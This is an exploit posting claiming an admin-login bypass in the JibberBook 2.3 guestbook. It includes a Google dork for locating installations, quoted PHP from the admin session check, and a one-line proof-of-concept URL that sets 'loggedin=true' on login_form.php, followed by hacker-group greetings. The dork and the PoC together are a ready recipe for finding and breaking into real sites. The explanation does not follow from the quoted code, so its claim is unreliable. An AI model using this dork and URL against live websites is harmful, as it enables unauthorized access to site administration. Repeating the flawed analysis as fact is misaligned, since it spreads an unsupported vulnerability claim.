#################################################
# Exploit Title : jibberbook Bypass Admin Vulnerability
#
# Author        : IrIsT.Ir & Sec4Ever.com
#
# Discovered By : L3b-r1'z
#
# Home          : http://IrIsT.Ir & http://Sec4Ever.com
#
# P Blob        : http://L3b-r1z.com/
#
# Software Link : http://jibberbook.com/
#
# Security Risk : High
#
# Version       : 2.3
#
# Tested on     : win\XP
#
# Dork          : allintext: "JibberBook created by chromasynthetic |
Powered by MooTools, HTML Purifier, and Akismet"
#
# 1) SCript
# 2) Info Vulnerabilty
# 3) P0c
#
#
#################################################
#
# 1) SCript:
# JibberBook allow the visitor to make comment or any thing like how
visitor like website :)
# or any msg for admin of site.
#
#
#################################################
#
# 2) Info Vulnerability :
# This exploit allow attacker to log into the admin panel with out write
username or password .
# Look Into The File index.php In jibberbook-2.3\admin :
#
# require_once('inc/secure.php');
# require_once('../inc/includes.php');
# includes(array('admin/actions/load.php',
'admin/actions/transformxml.php'));
#
# $_SESSION['referer'] = 'http://' . $_SERVER['HTTP_HOST'] .
$_SERVER['REQUEST_URI'];
# require_once('inc/header.php');
# ?>
# We have Require to File Named Secure , Lets Check it :) :
#
# session_start();
# if (!isset($_SESSION['admin']))
# {
#  if (is_file(realpath('login_form.php'))) {
#    $url = 'http://' . $_SERVER['HTTP_HOST'] .
dirname($_SERVER['REQUEST_URI'] . 'x') . '/login_form.php';
#  } else {
#    $url = 'http://' . $_SERVER['HTTP_HOST'] .
dirname(dirname($_SERVER['REQUEST_URI'] . 'x')) . '/login_form.php';
#  }
#  header("Location: $url");
#  exit();
# } else {
#  $loggedin = true;
# }
#
# The file don't have any secure here :P.
# Cz Look To Below Header , We Have else Loggedin = True, its mean if the
attacker not admin required to login_form.php
# else , Loggedin = true , Admin Redirect to Admin panel :).
#
#
#################################################
#
# 3) p0c :
#
# Site.Com/Admin/Login_form.php?loggedin=true
#
#################################################
#
#
# Special Thx To : Irist Team & Sec4Ever Team .
#
#################################################
#
#
# Greet'z : b0x, Virus-Ra3ch, Damane2011, Hacker-1420, The Injector,
N4ss1m, hacker-1420.
# Sec4ever, B07 M4S73R, Stalk3r, Hacker-Dz, Mr.XKILLeR, The Viper, Th3
Killer Dz.
# Over-X <3, And All My Friends.
#
#################################################

-- 
Proud To Be Lebanese :D

I Will Miss You My Friends : b0x, Virus-Ra3ch, Damane2011, Hacker-1420, The
Injector, N4ss1m, Sec4ever, B07 M4S73R, Stalk3r, Hacker-Dz, Mr.XKILLeR, The
Viper, Th3 Killer Dz, Over-X <3, And All My Friends.

Sec4ever.com.